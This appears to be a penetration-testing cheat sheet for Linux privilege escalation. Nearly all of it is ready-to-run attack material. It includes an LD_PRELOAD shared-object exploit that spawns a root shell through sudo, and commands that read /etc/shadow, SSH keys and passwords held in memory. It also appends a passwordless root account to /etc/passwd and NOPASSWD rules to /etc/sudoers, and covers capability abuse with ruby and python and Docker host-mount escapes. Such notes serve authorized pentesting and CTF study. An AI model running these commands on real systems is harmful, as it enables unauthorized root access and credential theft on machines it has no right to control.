❯ RedSquad

Manual

5 min read

INFO

Manual checks can help understand way more how attacks work.

Walkthrough

SUDO

# check sudo version for exploits
sudo -V | grep “Sudo ver”
 
# check rights
sudo -l
# gtfobins !
 
# sudo LD_PRELOAD
Defaults        env_keep += LD_PRELOAD
 
# COMPILE /tmp/exploit.c :
 
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/sh");
}
 
# with :
 
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
 
# Execute any binary with the LD_PRELOAD to spawn a shell : 
 
sudo LD_PRELOAD=<full_path_to_so_file> <program>
sudo LD_PRELOAD=/tmp/shell.so find
 
# sudo_inject | https://github.com/nongiach/sudo_inject
 
# requirements : 
#    Ptrace fully enabled (/proc/sys/kernel/yama/ptrace_scope == 0).
#    Current user must have living process that has a valid sudo token with the same uid.
 
sudo whatever
sh exploit.sh
 
# wait
sudo -i
# root !

User infos

id
wwhoami
w
last
cat /etc/passwd
cat /etc/sudoers
cat /etc/group

Kernel version

uname -a 
lsb_release -a
cat /proc/version /etc/issue /etc/*-release
# check for cves

Files, binaries and passwords

ls -la ~/ 
ls -la /var/mail /home/*/ /var/spool/mail /home/*/.bash_history /var
 
# check those files for hashes
cat /etc/passwd
cat /etc/shadow
ls -la /etc/passwd /etc/shadow
 
# can we write to the .bashsrc file ? if so, can be executed when us logs in
ls -la /root/.bashrc 
ls -la /home/*/.bashrc
locate .bashrc
find / -name .bashrc -xdev 2>/dev/null

Exposed infos

# Inspect environment variables
env
 
# Inspect .bashrc
cat .bashrc
 
# Inspect bash_history
cat .bash_history

Processes and ports

# something is running that we can exploit ?
ps aux | grep root
 
# localhost open ports ?
netstat -antup
 
# any useful info in the main bash user files ?
cat /etc/profile 
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

CronTabs & Scheduled jobs

# check for cronjobs
crontab -l 
ls -alh /var/spool/cron
ls -al /etc/ | grep cron; ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
 
# PSPY to to see commands run by other users, cron jobs, etc. in real time
./pspy > pspy-out.txt

File systems

# unmounted file-systems ?
cat /etc/fstab
 
# If NFS is open, check if the target has any open NFS shares, if it does, then mount it to your filesystem
showmount -e X.X.X.X
mount X.X.X.X:/ /tmp/mount1

Applications

# check installed apps + versions + running ?
ls -alh /usr/bin/ /sbin/ /var/cache/apt/archives /var/cache/yum/
dpkg -l
rpm -qa
# Any useful applications installed? 
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp tmux screen nmap 2>/dev/null

Sessions

# can we hijack any shell sessions ?
tmux ls
tmux attach -t tmuxname 
screen -ls
screen-dr sessionname
byobu list-session

Memory

# some services can save clear-text creds in memory
ps aux # grab the process id
gdb -p SERVICE; gdb PROCID
 
# in memory passwords
strings /dev/mem -n10 | grep -i PASS

Files permissions

INFO

If you fin something interesting, check GTFOBins.

# Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
 
# ssh
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
 
# World writable files on the system
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
 
# writable /etc/passwd
# add :
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy
 
# writable /etc/sudoers
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
 
# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
 
# World executable folder
find / -perm -o x -type d 2>/dev/null
 
# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

SUID / SGID / GUID

# SUID / SGID
find / -perm -u=s -type f 2>/dev/null | xargs ls -l
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null 
find / -perm -g=s -type f 2>/dev/null | xargs ls -l
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
 
# Look for any binaries that seem odd. Any binaries running from a users home directory?
# Check the version of any odd binaries and see if there are any public exploits that can be used to gain root
 
# SUID PATH
echo $PATH
env | grep PATH
print $PATH

Capabilities

INFO

Check for files with capabilities. These may allow us to access restricted files or directories. Having the capability =ep means the binary has all the capabilities.

/usr/bin/getcap -r  /usr/bin
getcap -r / 2>/dev/null
 
## Interesting capabilities
getcap openssl /usr/bin/openssl 
openssl=ep
#  the following capabilities can be used in order to upgrade your current privileges.
cap_dac_read_search # read anything
cap_setuid+ep # setuid
 
# EXAMPLES
# 1
# linpeas /usr/local/bin/ruby = cap_chown+ep 
echo 'File.chown(<User ID>, nil, "/etc/shadow")' > exploit.rb 
ruby exploit.rb 
chmod 777 /etc/shadow
nano /etc/shadow
 
# 2
# cap_setuid+ep python2.7
python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
sh-5.0# id
uid=0(root) gid=1000(swissky)

Capabilities list

Capabilities nameDescription
CAP_AUDIT_CONTROLAllow to enable/disable kernel auditing
CAP_AUDIT_WRITEHelps to write records to kernel auditing log
CAP_BLOCK_SUSPENDThis feature can block system suspends
CAP_CHOWNAllow user to make arbitrary change to files UIDs and GIDs
CAP_DAC_OVERRIDEThis helps to bypass file read, write and execute permission checks
CAP_DAC_READ_SEARCHThis only bypasses file and directory read/execute permission checks
CAP_FOWNERThis enables bypass of permission checks on operations that normally require the filesystem UID of the process to match the UID of the file
CAP_KILLAllow the sending of signals to processes belonging to others
CAP_SETGIDAllow changing of the GID
CAP_SETUIDAllow changing of the UID
CAP_SETPCAPHelps to transferring and removal of current set to any PID
CAP_IPC_LOCKThis helps to lock memory
CAP_MAC_ADMINAllow MAC configuration or state changes
CAP_NET_RAWUse RAW and PACKET sockets
CAP_NET_BIND_SERVICESERVICE Bind a socket to internet domain privileged ports

Docker

docker run -it -v /:/mnt bash chroot
 
docker run -v /root:/mnt -it bash

More about Docker

Docker Escape - Hacktricks Docker - RedSquad DeepCE - Github